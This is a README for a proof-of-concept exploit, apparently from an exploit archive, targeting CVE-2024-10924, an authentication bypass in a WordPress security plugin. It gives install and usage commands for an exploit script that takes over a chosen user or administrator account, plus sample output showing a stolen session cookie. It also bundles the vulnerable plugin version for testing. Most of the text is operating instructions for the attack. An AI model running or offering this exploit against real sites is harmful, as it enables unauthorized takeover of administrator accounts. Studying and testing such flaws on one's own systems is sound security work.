Share
## https://sploitus.com/exploit?id=B95DDF3F-F614-57F8-AAF7-C158ABE57264
# POC for CVE-2024-10924

An error handling flaw in the REST API of the Really Simple Plugins WordPress plugin (versions between 9.0.0 and 9.1.1.1 included) allows an attacker, when Two-Factor Authentication is enabled, to bypass authentication and take control of an existing user or administrator account.

As I'm a nice guy, you'll also find version 9.1.1.1 of the plugin. Just unzip and upload it in the `wp-content/plugins` folder. Don't forget to activate the plugin and enable 2FA.

## Requirements

Install the required dependencies using `pip`:

```bash
pip install -r requirements.txt
```

#### Dependencies List

-   **argparse**: For parsing command-line arguments
-   **validator-collection**: To validate the URL format.
-   **requests**: To send HTTP POST requests.
-   **random**: To generate a random nonce for the payload

## Usage

### Command Syntax

```bash
python exploit.py [-id USER_ID] URL
```

### Examples

1. **With a specific User ID**:

    ```bash
    python exploit.py -id 10 http://localhost:8886/
    ```

    This sends the exploit payload with a user ID of `10`.

2. **Without specifying User ID**:
    ```bash
    python exploit.py http://localhost
    ```
    Defaults the User ID to `1`.

## Example Output

### Successful Exploit

```plaintext
Exploit successful.

--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
```

### Failed Exploit

```plaintext
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
```

## Security Considerations

-   **Use responsibly**: This script is for educational and penetration testing purposes only.
-   **Authorization**: Ensure you have explicit permission to test the target system.
-   **HTTPS**: Disable SSL verification (`verify=False`) only if necessary for testing.

## License

IDK but I'm not responsible for anything.